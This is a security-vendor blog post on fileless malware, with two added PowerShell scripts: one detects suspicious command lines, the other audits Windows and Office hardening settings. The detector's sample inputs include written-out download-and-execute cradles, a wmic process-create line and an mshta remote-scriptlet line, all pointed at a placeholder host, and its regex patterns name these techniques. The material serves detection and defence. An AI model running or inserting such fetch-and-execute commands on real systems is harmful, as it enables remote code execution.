By The Integrity360 Team on November 14, 2018

Why Fileless Attacks Should Be On Every Company's Cyber Security Radar

Cyber Risk and Assurance, Breaches, Alerts & Advisories

Even the world’s most unskilled and inexperienced criminals know it’s always better to sneak in the back door of a shop instead of breaking down the one in the front.

Hackers are starting to follow the same logic, and the trend is resulting in an increase of fileless attacks. Armed with the knowledge that the vast majority of businesses have cyber security tools in place to scan and stop malicious files from carrying out their objective, criminals are getting around that obstacle by using alternative methods of delivering and executing a payload.

The emerging methodology is putting businesses on alert and prompting them to pay greater respect to fileless attacks in their cyber security strategies.

What is a fileless attack?

Fileless attacks, also known as fileless malware, forego the traditional method of dropping an executable file onto the victim’s disk. Instead, the malicious code runs in memory, inside processes that are already present on the machine, so there is little or nothing on disk for a file scanner to find.

Fileless attacks use infected documents, applications and websites, zero-day exploits or Remote Code Execution (RCE) vulnerabilities to deliver a malicious script, often a document macro or a single command line, to the target.

From there, the script calls and executes a payload through legitimate features already present on the endpoint. Some of these are built-in administration tools; others are techniques for running code inside a trusted process so that no new executable ever touches disk:

  • PowerShell
  • Process hollowing (replacing the code of a suspended, legitimate process with malicious code)
  • Remote Desktop Protocol (RDP)
  • Windows Management Instrumentation (WMI)
  • Dynamic Link Library (DLL) injection into a running process
  • PsExec (Microsoft’s Sysinternals remote-execution tool)

In layman’s terms: fileless attacks abuse legitimate programs, built to help users and administrators, to launch malicious code.
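As an added example, not code from the original article: a small PowerShell script that scores process-creation command lines (the kind Sysmon Event ID 1 or Windows Security event 4688 records) for the living-off-the-land patterns listed above, and decodes any -EncodedCommand payload so the hidden script is inspected as well. The sample command lines, indicator names, regular expressions and weights are constructed for this example and are not an established taxonomy.

```powershell
# Added example (not code from the original article). Scores process command
# lines, e.g. from Sysmon Event ID 1 or Security event 4688, for the
# living-off-the-land patterns the article lists. Indicator names, regexes and
# weights are this example's own choices, not an established taxonomy.

$FilelessIndicators = @(
    @{ Name = 'powershell-encoded-command'; Weight = 3
       Pattern = '(?i)-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}' }
    @{ Name = 'powershell-hidden-window';   Weight = 2
       Pattern = '(?i)-w(?:indowstyle)?\s+hidden' }
    @{ Name = 'powershell-no-profile';      Weight = 1
       Pattern = '(?i)-no(?:p|profile)\b' }
    @{ Name = 'execution-policy-bypass';    Weight = 1
       Pattern = '(?i)-e(?:p|xecutionpolicy)\s+bypass' }
    @{ Name = 'download-cradle';            Weight = 3
       Pattern = '(?i)DownloadString|DownloadFile|Invoke-WebRequest|Invoke-RestMethod' }
    @{ Name = 'invoke-expression';          Weight = 2
       Pattern = '(?i)\bIEX\b|Invoke-Expression' }
    @{ Name = 'inline-base64';              Weight = 2
       Pattern = '(?i)FromBase64String' }
    @{ Name = 'wmi-process-create';         Weight = 3
       Pattern = '(?i)wmic(?:\.exe)?\s.*process\s+call\s+create|Win32_Process\b.*\bCreate\b' }
    @{ Name = 'mshta';                      Weight = 3
       Pattern = '(?i)\bmshta(?:\.exe)?\b' }
    @{ Name = 'remote-scriptlet';           Weight = 2
       Pattern = '(?i)script:https?://|\.sct\b|scrobj\.dll' }
    @{ Name = 'rundll32-javascript';        Weight = 3
       Pattern = '(?i)rundll32(?:\.exe)?\s.*javascript:' }
    @{ Name = 'psexec';                     Weight = 1
       Pattern = '(?i)\bpsexec(?:64)?(?:\.exe)?\b' }
)

function ConvertFrom-EncodedCommand {
    # Returns the UTF-16LE script hidden behind -enc/-ec/-EncodedCommand, or $null.
    param([string]$CommandLine)
    if ($CommandLine -match '(?i)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})') {
        try { return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1])) }
        catch { return $null }   # not valid base64: leave it unscored rather than crash
    }
    return $null
}

function Test-FilelessIndicators {
    # Scores one command line; 4 or more (an arbitrary threshold for this example)
    # is reported as suspicious. The decoded payload is scanned alongside the
    # outer command line so a cradle hidden by -enc still counts.
    param([Parameter(Mandatory)][string]$CommandLine)
    $decoded = ConvertFrom-EncodedCommand $CommandLine
    $textToScan = if ($decoded) { "$CommandLine`n$decoded" } else { $CommandLine }
    $score = 0
    $names = @()
    foreach ($ind in $FilelessIndicators) {
        if ($textToScan -match $ind.Pattern) { $score += $ind.Weight; $names += $ind.Name }
    }
    [pscustomobject]@{
        Score       = $score
        Suspicious  = ($score -ge 4)
        Indicators  = $names
        Decoded     = $decoded
        CommandLine = $CommandLine
    }
}

# Constructed sample command lines (not real telemetry). The first is built here
# so the base64 is a genuine UTF-16LE encoding of a download cradle.
$cradle  = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($cradle))
$sampleCommandLines = @(
    "powershell.exe -nop -w hidden -enc $encoded"
    'wmic.exe process call create "powershell -w hidden -c IEX (New-Object Net.WebClient).DownloadString(''http://example.invalid/b'')"'
    'mshta.exe javascript:a=GetObject("script:http://example.invalid/c.sct").Exec();close();'
    'powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\Backup-Database.ps1'
    '"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n "C:\Users\alice\Documents\Q3 report.docx"'
)

$sampleCommandLines | ForEach-Object { Test-FilelessIndicators $_ } |
    Sort-Object Score -Descending |
    Format-Table Score, Suspicious, Indicators, CommandLine -AutoSize
```

Run as-is, the two download cradles and the mshta scriptlet score well above the threshold, while the signed-off backup script (ExecutionPolicy Bypass alone scores 1) and the Word launch do not. In production the same function would be fed from the SIEM or EDR rather than a constructed array, and the weights tuned against a baseline of the organisation’s own administrative PowerShell, since a blanket alert on PowerShell itself produces exactly the false-positive flood the article warns about.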

Why are fileless attacks seeing increased usage rates?

You’d be hard-pressed to find a company that doesn’t have an anti-virus solution in its inventory of cyber security tools. Traditional anti-virus platforms leverage signature-based detection to match characteristics of an attack with known instances of malware.

While that works for known samples, signature matching struggles with new techniques. These may exploit new types of attachment or, as in many fileless attacks, run malicious scripts purely in memory or inside other, trusted programs.

Threat groups have caught onto this fact, sparking a trend in usage among attackers. Researchers from SentinelOne clocked a 94 percent uptick in the frequency of fileless attacks over the first half of 2018. This accounted for 42 out of every 1,000 endpoint attacks reviewed and outstripped ransomware’s total, which was just 14 out of every 1,000.

Among all security incidents in 2017, 29 percent were fileless attacks, according to a report from the Ponemon Institute. This figure is expected to expand to one-third of all campaigns in 2018, largely because the study found that they’re nearly 10 times more likely to result in a successful attack than their file-based counterparts.

As long as organisations continue to rely on signature-only detection, fileless attacks will remain incredibly difficult to stop. Forward-thinking companies are adapting their cyber security strategies to the rise of fileless attacks by introducing user behaviour analytics, which applies machine learning to identify anomalous activity on the network.

How can businesses defend against fileless attacks?

Companies that rely on outdated cyber security strategies will have a difficult road ahead of them. Legacy tools aren’t able to give security specialists the granular visibility into user activity that’s necessary to spot a fileless attack, and instead can inundate them with false alerts.

Furthermore, they lack the ability to maintain pace with the barrage of new delivery options and techniques for execution that are hitting the industry. Once past initial defences, many attacks immediately end anti-virus services before commencing their activity.

Organisations can shrink the attack surface for fileless attacks through system hardening: disabling services that attackers commonly leverage but the business does not use, like the Remote Desktop Protocol (RDP) on machines nobody administers remotely. PowerShell is harder to simply switch off, because so much Windows administration depends on it; where it must stay, the usual first steps are to remove the legacy PowerShell 2.0 engine and turn on script block logging so that whatever it runs is recorded.

Businesses without a cyber security framework in place need to adopt one soon. Many of the controls required to comply with frameworks like the Center for Internet Security (CIS) Controls, formerly the Top 20, or the National Institute of Standards and Technology (NIST) Cybersecurity Framework can drastically improve a company’s security posture.

Furthermore, employee awareness training is becoming more critical by the day. A rising number of campaigns use malicious attachments in the form of Word and Excel documents, and even newer formats like Microsoft Publisher files and Excel Web Query (IQY) files, which make Excel fetch content from a URL, to spread the payload. If they are not stopped at the point of entry, it usually takes only one employee enabling macros on the content for the fileless attack to begin running in the background.
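The hardening and macro controls discussed above, as an added example that is not code from the original article: a PowerShell script that reports on a handful of Windows and Office settings (PowerShell script block logging, the legacy PowerShell 2.0 engine, RDP, and Office macros in files from the internet) and can optionally set the ones that are safe to change automatically. The registry paths are the ones Group Policy writes; the Office path assumes version 16.0 (Office 2016/2019/365), and the function names and the choice of which controls to auto-fix are this example’s own.

```powershell
# Added example (not code from the original article). Reports on, and can
# optionally set, settings that shrink the fileless attack surface the article
# describes. Registry paths are the ones Group Policy writes; the Office path
# assumes version 16.0 (Office 2016/2019/365), an assumption of this example.
# Run from an elevated session; -Apply is opt-in and changes live settings.

function Get-RegistryValueOrNull {
    param([string]$Path, [string]$Name)
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name }
    catch { $null }   # key or value absent: treated as "not configured"
}

function Get-FilelessHardeningReport {
    param([string]$OfficeVersion = '16.0')
    $office = "HKCU:\Software\Policies\Microsoft\Office\$OfficeVersion"
    $checks = @(
        # AutoFix = $true means Set-FilelessHardening -Apply may change it.
        @{ Control = 'PowerShell script block logging enabled'; AutoFix = $true
           Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
           Name = 'EnableScriptBlockLogging'; Expected = 1 }
        @{ Control = 'Word: block macros in files from the internet'; AutoFix = $true
           Path = "$office\Word\Security"; Name = 'blockcontentexecutionfrominternet'; Expected = 1 }
        @{ Control = 'Excel: block macros in files from the internet'; AutoFix = $true
           Path = "$office\Excel\Security"; Name = 'blockcontentexecutionfrominternet'; Expected = 1 }
        # RDP is reported only: disabling it where admins depend on it breaks operations.
        @{ Control = 'RDP inbound connections denied'; AutoFix = $false
           Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
           Name = 'fDenyTSConnections'; Expected = 1 }
    )
    foreach ($c in $checks) {
        $actual = Get-RegistryValueOrNull -Path $c.Path -Name $c.Name
        $status = if ($actual -eq $c.Expected) { 'OK' } else { 'REVIEW' }
        [pscustomobject]@{
            Control = $c.Control; Expected = $c.Expected; Actual = $actual
            Status  = $status;    AutoFix  = $c.AutoFix;  Path = $c.Path; Name = $c.Name
        }
    }
    # The PowerShell 2.0 engine has neither script block logging nor AMSI, so
    # "powershell -version 2" sidesteps the logging above; it should be removed.
    try {
        $v2 = (Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -ErrorAction Stop).State
    } catch { $v2 = $null }   # needs elevation, or not a Windows client/server build
    $status = if ($v2 -eq 'Disabled') { 'OK' } else { 'REVIEW' }
    [pscustomobject]@{
        Control = 'PowerShell 2.0 engine removed'; Expected = 'Disabled'; Actual = $v2
        Status  = $status; AutoFix = $false; Path = $null; Name = $null
    }
}

function Set-FilelessHardening {
    # Without -Apply, prints what would change. With -Apply, writes the DWORD values.
    param([switch]$Apply)
    $todo = Get-FilelessHardeningReport | Where-Object { $_.Status -eq 'REVIEW' -and $_.AutoFix }
    foreach ($f in $todo) {
        if (-not $Apply) { "Would set $($f.Path)\$($f.Name) = $($f.Expected)"; continue }
        if (-not (Test-Path $f.Path)) { New-Item -Path $f.Path -Force | Out-Null }
        Set-ItemProperty -Path $f.Path -Name $f.Name -Value $f.Expected -Type DWord
        "Set $($f.Path)\$($f.Name) = $($f.Expected)"
    }
}

# Usage: review first, then apply deliberately.
Get-FilelessHardeningReport | Format-Table Control, Expected, Actual, Status -AutoSize
Set-FilelessHardening            # dry run
# Set-FilelessHardening -Apply   # writes the AutoFix settings
```

On a domain-joined machine these are policy keys, so Group Policy will overwrite whatever is set locally; the script is useful for auditing and for standalone hosts, while the durable fix is the equivalent Group Policy settings. Removing the PowerShell 2.0 engine is left to the administrator (Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root) because it requires a reboot and a check that nothing still depends on it.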

These are all fundamental steps in taking back control of digital environments from emerging threats, but they fail to solve the underlying issue: Legacy technology that’s tasked with combating state-of-the-art attacks.

There are three solutions that businesses can take advantage of to defend their users and assets from fileless attacks:

  • Next-generation anti-virus and endpoint protection: Leverage artificial intelligence to overcome the limitations of signature-based detection.
  • Network segmentation: Create subnetworks to mitigate a hacker’s ability to move laterally.
  • Next-generation Security Information and Event Management (SIEM): Gain greater visibility into network movement and cut out false-positive alerts to spot attacks more quickly.

 

Fileless attacks aren’t going out of fashion anytime soon, and retro cyber security tools won’t be able to stop them. Talk with an Integrity360 consultant today to learn how your business can protect itself from hackers’ latest techniques.
